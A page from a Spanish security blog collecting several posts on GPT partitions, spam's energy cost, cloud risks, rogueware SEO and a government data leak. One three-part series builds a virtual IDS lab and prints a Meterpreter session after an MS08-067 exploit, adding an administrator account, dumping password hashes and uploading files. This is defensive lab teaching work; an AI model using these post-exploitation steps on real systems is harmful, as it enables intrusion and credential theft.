Security Art Work

Recientemente decidí adquirir para casa varios discos duros y una controladora raid por hardware con objetivo de poder almacenar de forma segura y duradera las copias de mis sistemas. Era la primera vez que montaba un entorno donde una sola partición ocupara un tamaño mayor de 2 TeraBytes (1 TB = 1024 GB) sin emplear LVM o MDADM. Cual fue mi sorpresa al comprobar que me era imposible crear una partición más grande de 2TB; me recordaba a los tiempos donde no se podían crear particiones de más de 4GB. Qué lejos queda, ¿verdad?

Buscando un poco de información, en especial en NixCraft y el aporte de mi compañero Raúl Rodriguez, descubrí que el origen de todos los problemas era el tipo de tabla de partición que empleaba (MS-DOS o MBR tradicional), ya que ésta no soporta más de 2 TB limitada por los 512 byte del tamaño del bloque. Para soportar particiones mayores se requiere emplear GUID Partition Table (GPT en adelante) que emplea adicionalmente el final el sector del disco para soportar particiones de mayor tamaño. Pero tengan cuidado, para complicar más las cosas GPT sólo funciona con BIOS que soporten EFI (Extensible Firmware Interface) como los Apple, y no en BIOS clásicas, por lo que si emplean discos de más de 2 TB únicamente podrán emplearlos como almacenamiento y no como arranque.

Veamos a continuación un ejemplo de cómo se migra de la tabla de partición MS-DOS a una tabla GPT en entornos Linux. Para ellos usaremos mi máquina nombrada con anterioridad, la cual dispone de un dispositivo físico (/dev/sdb) de 4.4 TB, resultado de un Raid5 por hardware de 4 discos duros de 1.5 TB:

# parted /dev/sdb
GNU Parted 1.9.0
Usando /dev/sdb
Welcome to GNU Parted! Type 'help' to view a list of commands.
(parted) print all
Model: Adaptec RAID (scsi)
Disk /dev/sdb: 4494GB
Sector size (logical/physical): 512B/512B
Partition Table: msdos

Podemos observar que se nos informa que la “Partition Table” es de tipo msdos, y por tanto no soportará discos de más de 2 TB. Veamos qué ocurre cuando intentamos crear una partición de más de 2 TB en una tabla de particiones tipo MS-DOS:

(parted) mkpart primary 0 4494GB
Error: partition length of 8776550412 sectors exceeds the 
msdos-partition-table-imposed maximum of 4294967295

Como vemos, no nos deja crear particiones de más de 2 TB. Para poder usarlo debemos cambiar el tipo de tabla de partición a GPT:

(parted) mklabel gpt
Aviso: The existing disk label on /dev/sdb will be destroyed and 
all data on this disk will be lost. Do you want to continue?
Sí/Yes/No? YES
(parted) mkpart primary 0 4494GB
(parted) print /dev/sdb
Model: Adaptec RAID (scsi)
Disk /dev/sdb: 4494GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Numero   Inicio   Fin   Tamaño   Sistema de ficheros   Nombre   Banderas
1        17,4kB  4494GB 4494GB   primary

Al cambiar a tipo GPT ya nos permite crear particiones de más de 2TB y en nuestro caso una partición de 4494 GB. El siguiente paso será formatear la partición, donde nos encontraremos de nuevo con varias limitaciones. En entornos de 32 bits el sistema de fichero ext3 solo tiene soporte hasta 4 TB, en cambio para entornos de 64 bits como son X86_64 o entornos de 32 bits con el LFS habilitado en el núcleo el límite es de 32TB. Reiserfs tiene un máximo en ambos casos de 16 TB.

Para el ejemplo usaremos ext3, tarda un “poquitín”:

# mkfs.ext3 /dev/sdb1
mke2fs 1.41.9 (22-Aug-2009)
ext2fs_check_if_mount: Can't check if filesystem is mounted due to 
missing mtab file mientras se determinaba si /dev/sdb1 está montado.
Etiqueta del sistema de ficheros=
Tipo de SO: Linux
Tamaño del bloque=4096 (bitácora=2)
Tamaño del fragmento=4096 (bitácora=2)
274268160 nodos-i, 1097070071 bloques
54853503 bloques (5.00%) reservados para el superusuario
Primer bloque de datos=0
Número máximo de bloques del sistema de ficheros=4294967296
33480 bloque de grupos
32768 bloques por grupo, 32768 fragmentos por grupo
8192 nodos-i por grupo
Respaldo del superbloque guardado en los bloques:
     32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
     4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
     102400000, 214990848, 512000000, 550731776, 644972544
Escribiendo las tablas de nodos-i: 557/33480

Con esto tendríamos listo nuestro disco de 4 TB. Para finalizar la entrada, indicarles que el tamaño máximo soportado por GUID Partition Table es de 256 TB, lo que probablemente les parezca mucho. Claro que rambién lo eran en su día 4GB o 2 TB…

No cabe duda de que el ordenador se ha convertido en una de las principales herramientas de trabajo en muchos hogares, muchas empresas y en la administración pública. Como tal, es hoy en día en una fuente importante de consumo energético. Si lo usamos de una manera adecuada seremos capaces de ahorrar energía, y no sólo desconectando el monitor cuando no lo usamos, apagando el equipo, poniéndolo en hibernación, en bajo consumo… o controlando el calor que emite. Hay otro factor importante que a veces se nos pasa por alto, pero que es una fuente de consumo energético muy importante: el correo spam.

Según el estudio “La huella de carbono del Spam” realizado por ICF International y publicado por la compañía de seguridad informática McAfee Inc. tomando como base datos de 2008, los correos electrónicos no deseados generan una cantidad de emisiones de efecto invernadero equivalente a la originada por 3.1 millones de vehículos. Esto supone un gasto energético de 33.000 millones de kilovatios por hora (KWh) en un año, cantidad suficiente para abastecer unos 2.4 millones de hogares en Estados Unidos.

Debido a que el 80% del correo no deseado termina siendo ignorado y borrado, esta energía es una energía totalmente desaprovechada. Un filtrado antispam ahorraría 135 TWh de electricidad al año, ahorro equivalente a retirar 13 millones de coches en circulación. Si todos los buzones de correo entrante estuvieran protegidos con un filtro antispam, empresas y usuarios particulares podrían reducir la energía que actualmente consume el spam en cerca de un 75%. El 80% del consumo energético asociado al spam es producido cuando los usuarios eliminan spam manualmente y buscan correo electrónico legítimo (falsos positivos). Filtrar spam solo representa el 16% del consumo energético de ese 80%.

Pero, si bien filtrar el spam es una correcta decisión, aún más beneficioso sería eliminarlo en origen. Cuando en 2008 la empresa estadounidense McColo Inc, uno de los principales generadores de spam fue desconectada de Internet, la energía ahorrada equivalió a 2.2 millones de coches en circulación; cada mensaje de spam no enviado implicó la correspondiente reducción de consumo de electricidad y, por lo tanto, de emisiones de dióxido de carbono. Normalmente la atención sobre el spam siempre ha estado centrada en sus repercusiones económicas, además de colapsar el ancho de banda, bajar la productividad de las empresas, sobrecargar los servidores de emails, y generar grandes pérdidas de tiempo, sin entrar en las estafas como el phising, por ejemplo. Ahora además nos convencemos de que el spam es una amenaza para el medio ambiente.

En el informe citado se analiza la energía consumida a nivel mundial en crear ,almacenar, ver y filtrar spam. También calcula las emisiones de GEI (Gases de Efecto Invernadero) que provoca este consumo energético, principalmente por el uso de combustibles fósiles (las fuentes mas costosas y perjudiciales) para producir electricidad. Las fuentes de emisiones que contribuyen de forma decisiva a la huella de carbono del spam son:

• Recopilación de direcciones.
• Creación de campañas de spam.
• Envío de spam desde equipos zombis y servidores de correo.
• Transmisión de spam de remitente a destinatario a través de Internet.
• Procesamiento de spam en servidores de correo entrante.
• Almacenamiento de mensajes.
• Visualización y eliminación de spam.
• Filtrado de spam y búsqueda de falsos positivos.

En la situación que nos encontramos, donde ahorrar energía ha pasado a ser una de las primeras acciones para solucionar el problema del colapso energético, no podemos pasar por alto este consumo ‘fantasma’ de energía eléctrica; en el artículo “El consumo fantasma, una forma no sostenible de emplear la energía eléctrica se muestran algunas formas de reducir el consumo fantasma de energía eléctrica.

Acabaré diciendo que este es, además, un estupendo argumento para ofrecer a todos esos aficionados a las cadenas de correo que parecen no responder a argumentos racionales de carácter tecnológico.

Seguramente habrán oído hablar del término “Océano Azul” empleado en marketing. W. Chan Kim y Reneé Mauborgne desarrollan la teoría en el libro titulado “Blue Ocean Strategy”. Grosso modo, su significado hace referencia a la necesidad de dejar a un lado la competencia destructiva entre las empresas y considerar que, para alcanzar el éxito (un éxito duradero y continuo), hay que ampliar horizontes generando valor a través de la innovación.

Llamamos “Océano Rojo” a la situación de mercado opuesta, la más común. Representa a aquellas industrias que ya se encuentran establecidas. Mercados maduros cuyas reglas de juego son conocidas, y en los que existe estandarización de procesos y prácticas, y el crecimiento sólo es posible a través del debilitamiento del poder de la competencia.

Cito algunos ejemplos para situarnos en contexto:

• La creación del Walkman por Sony revolucionó el mercado: “la música va contigo sin necesidad de llevar grandes aparatos”.
• El Cirque du Soleil (Circo del Sol) ha conseguido desmarcarse cambiando un espectáculo que se veía “estanco”. Ahora se basa en ofrecer el espectáculo a un público adulto incluyendo danza y teatro, precios altos, exclusividad…
• Los “hoteles Formula 1” de la cadena francesa Accor. Su estrategia se centró en disminuir la inversión en aspectos poco valorados por el target como el diseño exterior del hotel, mientras se concentraron en aspectos como la limpieza, el silencio en los cuartos, la rapidez y el precio.
• También se considera que Apple ha entrado en la estrategia Océano Azul con sus productos iPod, iPhone, y quizá ¿iPad?
• … y mucho más reciente, el “boom” de Nestlé con su producto Nespresso.

Personalmente la estrategia del Océano Azul me parece, cuanto menos, interesante. Lo que suele ocurrir con estas ideas que rompen esquemas es que del papel a la práctica hay un buen salto. En este caso, la estrategia del Océano Azul toma la innovación como factor clave. En lo que resta de artículo, y una vez hechas las pertinentes presentaciones, me gustaría aplicar esos conceptos al marco de la seguridad. No pretendo sacarme de la chistera ese producto estrella que nos llevaría al éxito (¡ojalá lo tuviera!); mi objetivo es un tanto menos ambicioso pero por otra parte, mucho más cercano y aplicable en el día a día… y se trata de establecer métodos que nos hagan más eficientes a la hora de innovar. El enfoque que propongo toma los sistemas de gestión como herramienta guía en la búsqueda de ese Océano Azul.

Es posible que tras el párrafo anterior alguno de vosotros ya haya pensado: ¿Sistemas de gestión? ¿Por qué?

Bien, el motivo es que la carencia de pautas concretas para “ampliar horizontes generando valor a través de la innovación” deja ese Océano Azul lejos de nuestro alcance. Dicho esto, ¿disponemos de técnicas / métodos o herramientas para potenciar la Innovación? La innovación se aprecia en muchas ocasiones como un proceso único y carente de estructura, no obstante, es posible enmarcar las actividades propias de la I+D+i en dentro de un marco metodológico que sistematice el desarrollo de las mismas. Recordemos brevemente los sistemas de gestión más habituales y algunos de los beneficios que aportan:

• Sistema de Gestión de la Calidad (SGC): Nos permite mantener e incrementar la calidad de nuestros productos o servicios, optimizar nuestros procesos, aumentar la satisfacción del cliente, etc. La norma ISO 9001 ofrece una guías sobre cómo diseñar dicho sistema.
• Sistema de Gestión de Seguridad de la Información (SGSI): Establecer y comprender los requisitos de seguridad de la información en la organización, controlar y administrar los riesgos de seguridad… en definitiva, este sistema dotará a nuestra organización de la protección que necesita. En este caso, Las normas ISO 27001 y 27002 son muy útiles si se desea implantar un SGSI.

Llegado a este punto es dónde quiero introducir el Sistema de Gestión de la Innovación (SG I+D+i). ¿Su finalidad? “Ejercer de catalizador de la creatividad, generando ideas innovadoras, que nos permitan orientar nuestros desarrollos hacia ese Océano Azul.”

El Sistema de Gestión de Innovación (SG I+D+i) contribuirá a alcanzar los objetivos de la organización fomentando y potenciando las actividades de I+D+i, proporcionará una guía para la correcta gestión de los recursos dedicados a la innovación, aumentará la competitividad y del crecimiento empresarial, etc. Para ello, podemos partir de las indicaciones de la norma UNE 166002 como base para el diseñó de nuestro SG I+D+i.

Aprovecho para destacar los beneficios que puede aportar la integración de diversos sistemas de gestión ya que su sinergia nos permite obtener un valor añadido “extra”. Me explico. Disponer de un sistema de gestión de la calidad contribuirá a crear un entorno favorable que en el que desarrollar las actividades propias de la I+D+I. La revisión sistemática de los procesos y procedimientos del SGSI incrementarán la seguridad… y finalmente, obviando otras implicaciones, potenciar la innovación nos llevará a crear nuevos productos y a obtener mejoras en los existentes. Mejoras que producirán un impacto positivo en la seguridad de nuestros sistemas.

Antes de despedirme me gustaría matizar que cuando hablo de Seguridad, hablo, como es habitual en estos lares, de la Seguridad de la Información. De todos modos, y después de haber leído el texto, creo que sería igualmente aplicable a otros campos. Concluyo esta pequeña aportación, a mitad camino entre reflexión y brainstorming, animando a los lectores a buscar técnicas, métodos o herramientas que ayuden a encontrar alguno de estos Océanos azules.

Recientemente se ha publicado un informe de la Cloud Security Alliance en el que se destacan las principales amenazas o problemas de seguridad que se pueden encontrar en la utilización de la computación en la nube (también conocida por su sinónimo en inglés Cloud Computing). Como ustedes sabrán, la computación en la nube se basa en la externalización de toda la infraestructura utilizada por la empresa en sus procesos informáticos, de forma que un proveedor de servicios mantiene tanto el hardware como el software necesario, y proporciona al usuario un punto de acceso a toda esa infraestructura.

Como mantener una infraestructura separada para cada cliente es muy costoso, las empresas que proporcionan este tipo de servicios (llamados Infraestructure as a Service, o IaaS) utilizan técnicas de virtualización para rebajar costes y aumentar las posibilidades de escalado de sus sistemas. La virtualización permite en este caso compartir recursos del proveedor entre varios clientes. Pero estos recursos no suelen estar preparados para soportar los niveles de aislamiento requeridos por las tecnologías actuales de virtualización. Para salvar este bache y controlar los recursos que se asignan a cada cliente, los entornos de virtualización disponen de un sistema (llamado Hipervisor) que actúa de mediador entre los sistemas virtuales de los clientes y el sistema principal.

Este hipervisor añade otra capa de abstracción, lo que genera un punto de fallo más además de los puntos de fallo en aplicaciones y sistemas operativos controlados habitualmente. Pero lo importante de este punto de fallo es su criticidad, ya que podría permitir puentear el hipervisor y acceder de forma directa a la infraestructura física, obteniendo acceso a todos los datos del equipo físico (incluidos datos de otros clientes). Esto ya ha sido demostrado anteriormente, con los prototipos de malware llamados Red Pill y Blue Pill de Joanna Rutkowska, y en las conferencias BlackHat de los años 2008 y 2009.

Una vez conocido este problema y la amenaza que supone para la seguridad de nuestros datos, el siguiente paso consiste en mitigarlo. En esta linea se pueden realizar las siguientes acciones:

• Implementar sistemas de “mejores prácticas” de seguridad durante la instalación y configuración de los sistemas y aplicaciones.
• Llevar un control exhaustivo del entorno para detectar actividades y cambios no autorizados tanto en las tareas y procesos habituales como en los datos almacenados en los sistemas virtualizados.
• Promover controles de autenticación y acceso muy estrictos para el acceso y realización de operaciones administrativas.
• Implantar de Acuerdos de Nivel de Servicio (SLA) para la aplicación de parches y corrección de vulnerabilidades.
• Realizar análisis de vulnerabilidades y auditorías de la configuración de forma periódica.

Para concluir, cabe resaltar la importancia que está cobrando la computación en la nube en estos momentos, con lo cual detectar y solventar estas y otras amenazas es crucial para adaptarse a las necesidades de seguridad del usuario, y dotar al servicio de las garantías necesarias en esta materia.

Una vez hemos realizado los ataques, vamos a acabar esta breve serie, analizando que han sido capaces de capturar el Snort empleando las reglas del VRT, y un OSSEC con la configuración por defecto.

Por parte del Snort, éste ha detectado 4 ataques. Como vemos en la captura, éste detecta el acceso por Terminal Server y el acceso al recurso compartido C por contraseña, o el uso del llsrpc pero no vemos rastro real de la ejecución del exploit o del meterpreter. Esto es debido a que las reglas por defecto que generan dichas alertas dan lugar a muchos falsos positivos y por defecto están deshabilitadas:

En la parte del OSSEC nos llama la atención que no salten alertas tales como la creación de nuevos usuarios en la máquina o de usuarios agregados al grupo de Administradores. Debemos recordar que la configuración es la de por defecto, sin habilitar logs extendidos ni otras variantes.

[Read more…]

Tal como vimos ayer en la entrada anterior, hemos montado un laboratorio de análisis de ataques y comportamientos anómalos de una red; espero que los más laboriosos —y con más tiempo libre— se hayan decidido a acompañarme con su propio equipo. Como prueba de concepto del laboratorio, se va a realizar un ataque explotando la vulnerabilidad ms08-067 empleando para ello el framework Metasploit, donde se introducirá como payload Meterpreter, una shell residente en memoria.

Una vez explotada dicha vulnerabilidad, crearemos un usuario “s2”, lo introduciremos en el grupo de administradores, obtendremos las hash de los usuarios del sistema (muy importante para el pass the hash), descargaremos ficheros, subiremos ficheros, modificaremos la web del servidor y nos conectaremos por Terminal Server. Así pues, comencemos con ello.

En primer lugar, vamos a explotar la vulnerabilidad, a la cual nuestro sistema Windows es vulnerable:

Una vez explotada la vulnerabilidad, pasamos a realizar todas las acciones descritas anteriormente:

meterpreter > execute -f cmd.exe -c 
Process 1680 created. 
Channel 4 created. 
meterpreter > interact 4 
Interacting with channel 4... 

Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32>net user s2 1234 /add 
net user s2 1234 /add 
The command completed successfully. 
 

C:\WINNT\system32>net localgroup Administrators s2 /add 
net localgroup Administrators s2 /add 
The command completed successfully. 


C:\WINNT\system32>net localgroup Administrators 
net localgroup Administrators 
Alias name     Administrators 
Comment       Administrators have complete and unrestricted access to the 
                                                               computer/domain 

Members 

------------------------------------------------------------------------------- 
Administrator 
NetShowServices 
prueba 
s2 
The command completed successfully. 

C:\WINNT\system32>exit

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
IUSR_VICTIMA:1003:0e8ff62b99bc1ad29e3224a00ea92e5f:e8fcdfdbcc579dba2871d859e6b7fb3d::: 
IWAM_VICTIMA:1004:8363ef1550e112c831b03fd6a774eb9e:68fce39bee7df9990aa9082108ae3deb::: 
NetShowServices:1001:c4a1cbf4d0c1c37d01f4d415e335dff5:712b9dda73b053545187aeec8f64db6c::: 
prueba:1008:b757bf5c0d87772faad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6::: 
s2:1011:b757bf5c0d87772faad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6::: 
TsInternetUser:1000:b8a10dcd5241884aa381080396088734:a040e830159b73b94d62527980415c04::: 
meterpreter > upload /tmp/pass c:\ 
[*] uploading  : /tmp/pass -> c:\ 
[*] uploaded   : /tmp/pass -> c:\\pass

Para finalizar, nos creamos un directorio s2 dentro del directorio del servidor web y en su interior un fichero index.html que contiene los hash de los usuarios de la máquina:

Mañana acabaremos esta breve serie analizando qué hemos detectado con el Snort y el OSSEC. Como ya les dije, si tienen alguna duda o no les ha quedado claro algún paso, no tienen nada más que decirlo.

Comenzamos con este artículo una serie de tres entradas en las que se va a mostrar como construir un (relativamente) sencillo laboratorio virtual sobre una única máquina física para la detección y prevención de ataques. Como requisitos previos, el laboratorio se monta sobre un entorno Linux, empleando la herramienta VirtualBox para las máquinas virtuales. Para conectar las máquinas virtuales entre si se empleará un hub virtual mediante la herramienta de virtualización UML (uml_switch).

Este entorno va a estar formado por tres máquinas virtuales: la primera será la máquina atacante (Linux Debian), la máquina víctima (Windows 2000 SP4) y por último la máquina IDS (Linux Ubuntu Server). Esta última dispondrá de una serie de herramientas de monitorización para observar y analizar los ataques producidos desde la máquina atacante a la máquina víctima, y de esta forma localizar un patrón que identifique dichos ataques. En concreto hemos instalado un servidor OSSEC (HIDS), una sonda Snort sobre un MySQL con B.A.S.E. (NIDS) y un analizador de red (wireshark y tcpdump).

Hechas las pertinentes presentaciones, vamos al tajo. Primero de todo, comenzamos creando el hub virtual; en nuestro caso el usuario será jmoreno, el grupo jmoreno y la interfaz tap0:

# tunctl -u jmoreno -g jmoreno -t tap0 
Set 'tap0' persistent and owned by uid 1002 gid 1002 
# ifconfig tap0 10.0.0.4 netmask 255.255.255.0 up 
# uml_switch -hub -tap tap0 -unix /tmp/mipuente 
uml_switch will be a hub instead of a switch 
uml_switch attached to unix socket '/tmp/mipuente' tap device 'tap0' 
New connection 
(Veremos las conexiones a nuestro hub)

A continuación nos creamos tres máquinas virtuales con VirtualBox. La configuración de la red para cada máquina virtual será de “puente o bridge” seleccionando como interfaz “tap0”. Para nuestro laboratorio vamos a asignar las siguientes IPs a cada una de las máquinas virtuales:

Atacante: 10.0.0.1 
Víctima: 10.0.0.2 
IDS: 10.0.0.3

Para finalizar esta primera entrada, inicializamos las máquinas virtuales y comprobamos que la comunicación entre el servidor OSSEC y el cliente está funcionando correctamente. Adicionalmente realizamos una serie de calibraciones sobre el Snort que demuestran su correcto funcionamiento:

Como ven el funcionamiento es correcto. Por tanto en este momento disponemos de un laboratorio donde poder, desde la máquina atacante, explotar las vulnerabilidades de la Víctima, y a su vez, monitorizar mediante el IDS todos los sucesos que ocurren entre ambas máquinas, y encontrar patrones que permitan poder detectar dichos ataques. Por hoy, esto es todo; mañana continuaremos, aunque les recomiendo que, si están interesados y disponen de tiempo, ganas y un Linux para trastear, me acompañen durante estas entradas, e iremos resolviendo los problemas y dudas que les vayan surgiendo.

Algunos tuvimos la oportunidad de celebrar el pasado día mundial de Internet con una mesa redonda sobre Cloud Computing en la que participaron ocho personalidades de distintas multinacionales, de las que solo una de ellas era española. La mesa redonda estuvo moderada por la Consejera de Justicia y Administraciones Públicas de la Generalitat Valenciana y la verdad es que fue bastante interesante, e incluso yo diría que pertinente y adecuada en los tiempos que corren, tanto por la forma, como por el fondo.

Cloud es una moda. Todos estaban de acuerdo en que ya no es una utopía. Es una realidad, pero una realidad de moda. También parecían estar todos de acuerdo que una de las grandes ventajas que tiene este nuevo paradigma (así lo presentan algunos) es la reducción de costes. “Es una nueva forma de hacer outsourcing en un entorno global y virtual”, decían algunos. “Es una forma clara de reducir costes e incluso de incrementar la productividad”, decían otros. La verdad es que en medio de todas estas afirmaciones, vertidas incluso en ocasiones con pasión, yo me preguntaba si no será este otro de esos conceptos que usan las grandes firmas para seguir haciendo negocio con cosas que el resto de los mortales no acaban de entender.

En mi humilde opinión Cloud Computing es un concepto muy interesante que seguro ya tiene y tendrá aplicaciones en diversos campos, ahora bien, la solución a todos los problemas no es el Cloud Computing, ni siquiera es un modelo de gestión o una tecnología disruptiva equivalente, como algunos defienden, a la aparición de Internet. Para empezar, porque es un modelo que ya funciona en la red desde hace tiempo y porque lo único que se ha hecho es bautizarlo con un nombre pegadizo que estoy seguro moverá cifras millonarias en los próximos años.

Se habla de la consolidación de unos cuantos Data Centers gigantes a nivel mundial como proveedores de servicios en la nube y su connivencia con unos cuantos operadores y algunos proveedores de aplicaciones en la misma nube. Se habla del traslado de cantidades ingentes de información a la nube, de información de todo tipo y color, se habla de los inmensos beneficios que le puede suponer para una empresa de tamaño medio hacer uso de este modelo, e incluso, alguno se atreve a poner un ejemplo dónde los ahorros de costes superan el 50%, citando incluso la organización en cuestión.

Yo no sé si esto será exacto o si será una “realidad aumentada”, pero ¿alguien se ha parado a pensar lo que realmente significa esto? ¿Alguien se ha parado a pensar en las implicaciones de seguridad que puede tener el traslado indiscriminado del conocimiento de las organizaciones de todo tipo a la nube? ¿Alguien se ha parado a pensar en el riesgo de la concentración de activos y conocimiento para una compañía o para un estado? Si a veces no pueden las organizaciones confiar en sus propios equipos, ¿por qué van a hacerlo en los equipos de terceros de forma masiva e indiscriminada? ¿No creen ustedes que aunque este modelo tiene y va a tener sentido para algún tipo de aplicaciones e información no lo puede tener nunca para otro?

Yo creo que como siempre se han hecho algunos análisis interesados de las virtudes de este concepto y que se han propagado a los cuatro vientos sus ventajas, pero también creo que no se ha contado de la misma forma sus inconvenientes, aunque me consta que si se han analizado. No hay más que ver el estudio que ha publicado recientemente la Cloud Security Alliance (CSA) [PDF] donde tímidamente o superficialmente (como quieran ustedes llamarlo) analizan los principales problemas de seguridad con los que se encuentra el Cloud Computing llevado a sus extremos. Cloud Computing es por tanto una moda con grandes virtudes y con grandes defectos. Si no se desarrolla con sumo cuidado, el mismo concepto es, en sí mismo, una amenaza para la seguridad de las organizaciones. No conté las palabras que se usaron en la mesa redonda pero les aseguro que la palabra Seguridad salió muchas veces y la usaron todos los participantes en la mesa redonda, incluyendo algunos invitados del público. Evidentemente esto quiere decir algo, ¿no creen?

Seguro que seguiremos hablando del recién nacido “Cloud” porque va a dar mucho juego….

Ayer, leyendo noticias sobre la serie “Lost”, de la cual soy fan, he visto algo que me ha llamado la atención. Panda Security, a través de PandaLabs ha publicado que en las últimas horas han proliferado en los motores de búsqueda numerosas páginas web que distribuyen el falso antivirus (rogueware) “MySecurityEngine”, usando para ello como gancho el final de la serie “Lost”. Cuando alguien busca en Internet información sobre la serie o referencias para visualizar el ultimo capitulo online mediante streaming aparecen como resultados webs falsas que han sido indexadas para aparecer en las primeras posiciones. Cuando el usuario pincha uno de estos enlaces se le pide su consentimiento para descargar algún archivo, como por ejemplo un códec, momento en el cuál se instala el falso antivirus en su ordenador; sorprende la velocidad con la que consiguen crear las webs e indexarlas a través de Google.

También se comenta que no sólo se usa el final de “Lost” para engañar a los internautas; series como Padre de Familia, Glee , la película Iron Man 2, o el reciente fallecimiento del cantante de ‘Rainbow’ o ‘Black Sabbath’, Ronnie James Dio, también son usados como reclamo para desplegar un ataques de Black Hat SEO a través de Internet, es decir usando métodos y técnicas que no son admitidas como legales para posicionarse en los buscadores, pero que son efectivas.

Respecto a la serie “Lost”,algunas de las palabras clave que pueden dar como resultado malware son las siguientes: Lost New Episode April 27, Lost New Episode Time, Lost New Episode Online, Lost New Episode Tonight. Según publican en PandaLabs:

“si pulsas el enlace de alguno de los resultados maliciosos, serás redirigido a páginas como www.1.saveppc2d.xorg.pl o wwww.1.bestfast31p.xorg.pl desde las que se descarga un archivo llamado PACKUPDATE_BUILD107_195.EXE y que corresponde a Adware/MySecurityEngine“.

Los ‘rogueware‘ o falsos antivirus son un tipo de amenaza que consiste en falsas soluciones de antivirus diseñadas para obtener dinero de los usuarios, cobrándoles por “desinfectar” sus ordenadores de amenazas que, en realidad, no existen. Como se indica en la imagen de PandaLabs, las cifras indican que a mediados del 2009 se habían detectado cerca de 640.000 tipos diferentes de falsos antivirus, 10 veces mas que el año anterior. Como vemos este tipo de malware crece de manera espectacular, y se calcula que se infectan aproximadamente unos 25 millones de nuevos ordenadores cada mes, generando unos 34 millones de dólares mensuales. Por supuesto el tema económico es la razón mas importante por la que el crecimiento del malware no cesa. No me extrañaría nada que involucrada en el tema estuviese la Iniciativa Dharma.

En cualquier caso, pasen un buen fin de semana, no se descarguen antivirus sospechosos, y esperamos que el final de “Lost” no nos decepcione…

Noticia de hoy, calentita: un fallo en la web del Ministerio de Vivienda daba acceso a datos personales de solicitantes de la renta de emancipación, permitiendo al parecer acceder incluso a información fiscal de otros solicitantes (datos de nivel medio). Pero no, no voy a entrar en la desgastada discusión de que si esto pasa o no pasa porque las administraciones públicas no tienen una especial sensibilidad ni concienciación en cuanto a sus responsabilidades en el tratamiento de los datos de carácter personal, de si esto pasa porque no están sujetas al régimen sancionador de la LOPD, etc.

Quiero ir por otro lado. A mi juicio este incidente es un ejemplo práctico y claro que hace patente la necesidad de que el Esquema Nacional de Seguridad (ENS) pase de ser una mera declaración de intenciones a una obligación real y efectiva. El servicio de gestión, consulta y seguimiento del estado de tramitación de las citadas solicitudes de renta de emancipación ante el Ministerio de Vivienda es un servicio sujeto, se mire por donde se mire, al cumplimiento de la Ley 11/2007 de acceso electrónico de los ciudadanos a los servicios públicos. El artículo 42 de esta ley decía que se establecerían unos criterios para definir el marco en materia de seguridad, normalización de la información y de las aplicaciones a utilizar para que este acceso electrónico se desarrolle de manera segura. Por eso en enero de este año se publicaron el Esquema Nacional de Seguridad (RD 3/2010) y el Esquema Nacional de Interoperabilidad (RD 4/2010).

El principal objetivo del ENS es definir el marco de confianza necesario para que se desarrolle adecuadamente el intercambio de información entre las administraciones públicas y los ciudadanos y terceras empresas a través de estos medios electrónicos, determinando las medidas de seguridad necesarias que deben cumplir los sistemas de información que les dan soporte. Porque el ENS habla de la seguridad integral, y de que debe ser una función segregada, y de lo importante que es la formación y la profesionalidad, y del marco operacional en el que se deben mover los servicios externos, y de medidas de seguridad sobre sistemas, sobre aplicaciones…

Y esto entronca con la necesidad imperiosa (lo estamos viendo casi a diario en muchos de los proyectos en los que trabajamos) de que se implanten metodologías de desarrollo de software seguro, que integren los criterios de seguridad desde la etapa del diseño de requerimientos de cualquier aplicativo (véase el art. 19 del ENS), y con la necesidad imperiosa de que las empresas de desarrollo acrediten que efectivamente tienen en cuenta estos criterios al desarrollar sus servicios —de hecho el ENS viene a contemplar una reacción en cadena en cuanto a que las administraciones públicas deberán solicitar a sus proveedores evidencias de que gestionan de manera segura los servicios que prestan (ISO 27001, etc.)—.

Y esto —a mi modesto entender— no tiene nada que ver con si eso pasa porque no hay un colegio de ingenieros en informática que ejerza como tal, que si eso pasa porque los telecos están invadiendo las competencias de los informáticos, que si eso pasa porque estas empresas son “cárnicas” o no lo son… (reconozco que este último párrafo casi orienta el post a la sección GOTO…).

No tengo tiempo para extenderme más. Sólo quería compartir con ustedes esas dos o tres ideas que me han venido a la cabeza al leer la noticia que les he referido.

(N.d.E.: El error en la web de la DGT del que Samuel Parra se hacía eco justo ayer va por los mismos derroteros)